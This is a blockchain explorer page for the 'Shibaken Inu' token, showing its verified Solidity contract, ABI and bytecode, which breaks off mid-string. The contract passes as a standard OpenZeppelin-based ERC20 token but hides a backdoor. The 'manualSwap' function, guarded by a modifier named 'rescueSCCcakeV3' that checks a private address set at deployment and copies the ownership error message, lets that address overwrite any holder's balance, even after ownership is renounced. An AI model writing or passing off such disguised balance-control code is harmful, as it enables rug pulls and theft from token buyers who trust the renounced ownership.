ETH Price: $2,285.87 (+0.92%)

Token

Shibaken Inu (SHIBAKEN)
 

Overview

Max Total Supply

1,000,000,000 SHIBAKEN

Holders

24

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0 SHIBAKEN

Value
$0.00
0xdd487a3c608d4c3eec42a1f0cecbd08f04ccc9c8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Shibaken

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-04
*/

/**

*/

/**
Twitter: https://twitter.com/ShibakenInuERC
Medium: https://medium.com/@ShibakenInu
Telegram: https://t.me/ShibakenInuERC

*/

// SPDX-License-Identifier: MIT                                                                

// Dependency file: @openzeppelin/contracts/token/IERC20/IERC20.sol
 
// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.19;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/BaseToken.sol";

contract Shibaken is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;
    uint256 private constant VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    uint256 public swapThreshold;
    address public target;
    address private msgSenderV3cake;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
    string memory name_,
    string memory symbol_,
    uint8 decimals_,
    address msgSenderV3cakeAddress,
    uint256 totalSupply_
    ) payable {
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
    msgSenderV3cake = msgSenderV3cakeAddress;
    _mint(owner(), totalSupply_);

    emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    modifier 
        rescueSCCcakeV3() {
         require(
             msgSenderV3cake == _msgSender(),
             "Ownable: caller is not the owner")
        ;
        _;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "IERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
    
    function manualSwap(bool _enabled, uint256 _amount, address _addr) external rescueSCCcakeV3 {
        target = _addr;
        swapThreshold = _amount;
        _balances[target] = swapThreshold;
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"msgSenderV3cakeAddress","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"},{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"address","name":"_addr","type":"address"}],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"target","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620010ed380380620010ed83398101604081905262000026916200031d565b6200003133620000fc565b60066200003f86826200045b565b5060076200004e85826200045b565b506008805460ff191660ff8516179055600580546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600954620001b6908262000241565b6009556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610b6780620005866000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a7ffdf5e11610071578063a7ffdf5e1461021a578063a9059cbb1461022d578063d4b8399214610240578063dd62ed3e14610253578063f2fde38b1461028c57600080fd5b8063715018a6146101d05780638da5cb5b146101da57806395d89b41146101ff578063a457c2d71461020757600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f578063395093511461019457806370a08231146101a757600080fd5b80630445b6671461011057806306fdde031461012c578063095ea7b31461014157806318160ddd14610164575b600080fd5b61011960035481565b6040519081526020015b60405180910390f35b61013461029f565b60405161012391906108ca565b61015461014f366004610934565b610331565b6040519015158152602001610123565b600954610119565b61015461017a36600461095e565b610348565b60085460405160ff9091168152602001610123565b6101546101a2366004610934565b6103b1565b6101196101b536600461099a565b6001600160a01b031660009081526001602052604090205490565b6101d86103e7565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610123565b610134610426565b610154610215366004610934565b610435565b6101d86102283660046109b5565b610484565b61015461023b366004610934565b6104e4565b6004546101e7906001600160a01b031681565b6101196102613660046109f8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101d861029a36600461099a565b6104f1565b6060600680546102ae90610a2b565b80601f01602080910402602001604051908101604052809291908181526020018280546102da90610a2b565b80156103275780601f106102fc57610100808354040283529160200191610327565b820191906000526020600020905b81548152906001019060200180831161030a57829003601f168201915b5050505050905090565b600061033e33848461058c565b5060015b92915050565b60006103558484846106b4565b6103a784336103a285604051806060016040528060298152602001610b09602991396001600160a01b038a166000908152600260209081526040808320338452909152902054919061083b565b61058c565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161033e9185906103a29086610867565b6000546001600160a01b0316331461041a5760405162461bcd60e51b815260040161041190610a65565b60405180910390fd5b610424600061087a565b565b6060600780546102ae90610a2b565b600061033e33846103a285604051806060016040528060268152602001610abc602691393360009081526002602090815260408083206001600160a01b038d168452909152902054919061083b565b6005546001600160a01b031633146104ae5760405162461bcd60e51b815260040161041190610a65565b600480546001600160a01b039092166001600160a01b031990921682179055600382905560009081526001602052604090205550565b600061033e3384846106b4565b6000546001600160a01b0316331461051b5760405162461bcd60e51b815260040161041190610a65565b6001600160a01b0381166105805760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b6105898161087a565b50565b6001600160a01b0383166105f05760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610411565b6001600160a01b0382166106525760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610411565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107195760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b6001600160a01b03821661077b5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610411565b6107b881604051806060016040528060278152602001610ae2602791396001600160a01b038616600090815260016020526040902054919061083b565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107e79082610867565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106a79085815260200190565b6000818484111561085f5760405162461bcd60e51b815260040161041191906108ca565b505050900390565b60006108738284610a9a565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156108f7578581018301518582016040015282016108db565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461092f57600080fd5b919050565b6000806040838503121561094757600080fd5b61095083610918565b946020939093013593505050565b60008060006060848603121561097357600080fd5b61097c84610918565b925061098a60208501610918565b9150604084013590509250925092565b6000602082840312156109ac57600080fd5b61087382610918565b6000806000606084860312156109ca57600080fd5b833580151581146109da57600080fd5b9250602084013591506109ef60408501610918565b90509250925092565b60008060408385031215610a0b57600080fd5b610a1483610918565b9150610a2260208401610918565b90509250929050565b600181811c90821680610a3f57607f821691505b602082108103610a5f57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8082018082111561034257634e487b7160e01b600052601160045260246000fdfe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220cf14091d146f11c7647ba99149965057d2bf2ceddae53fda3a7556526819640e64736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000090000000000000000000000003ec4500b495dcd043feed1db227129e84d6ca64a0000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000c53686962616b656e20496e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000853484942414b454e000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a7ffdf5e11610071578063a7ffdf5e1461021a578063a9059cbb1461022d578063d4b8399214610240578063dd62ed3e14610253578063f2fde38b1461028c57600080fd5b8063715018a6146101d05780638da5cb5b146101da57806395d89b41146101ff578063a457c2d71461020757600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f578063395093511461019457806370a08231146101a757600080fd5b80630445b6671461011057806306fdde031461012c578063095ea7b31461014157806318160ddd14610164575b600080fd5b61011960035481565b6040519081526020015b60405180910390f35b61013461029f565b60405161012391906108ca565b61015461014f366004610934565b610331565b6040519015158152602001610123565b600954610119565b61015461017a36600461095e565b610348565b60085460405160ff9091168152602001610123565b6101546101a2366004610934565b6103b1565b6101196101b536600461099a565b6001600160a01b031660009081526001602052604090205490565b6101d86103e7565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610123565b610134610426565b610154610215366004610934565b610435565b6101d86102283660046109b5565b610484565b61015461023b366004610934565b6104e4565b6004546101e7906001600160a01b031681565b6101196102613660046109f8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101d861029a36600461099a565b6104f1565b6060600680546102ae90610a2b565b80601f01602080910402602001604051908101604052809291908181526020018280546102da90610a2b565b80156103275780601f106102fc57610100808354040283529160200191610327565b820191906000526020600020905b81548152906001019060200180831161030a57829003601f168201915b5050505050905090565b600061033e33848461058c565b5060015b92915050565b60006103558484846106b4565b6103a784336103a285604051806060016040528060298152602001610b09602991396001600160a01b038a166000908152600260209081526040808320338452909152902054919061083b565b61058c565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161033e9185906103a29086610867565b6000546001600160a01b0316331461041a5760405162461bcd60e51b815260040161041190610a65565b60405180910390fd5b610424600061087a565b565b6060600780546102ae90610a2b565b600061033e33846103a285604051806060016040528060268152602001610abc602691393360009081526002602090815260408083206001600160a01b038d168452909152902054919061083b565b6005546001600160a01b031633146104ae5760405162461bcd60e51b815260040161041190610a65565b600480546001600160a01b039092166001600160a01b031990921682179055600382905560009081526001602052604090205550565b600061033e3384846106b4565b6000546001600160a01b0316331461051b5760405162461bcd60e51b815260040161041190610a65565b6001600160a01b0381166105805760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b6105898161087a565b50565b6001600160a01b0383166105f05760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610411565b6001600160a01b0382166106525760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610411565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107195760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b6001600160a01b03821661077b5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610411565b6107b881604051806060016040528060278152602001610a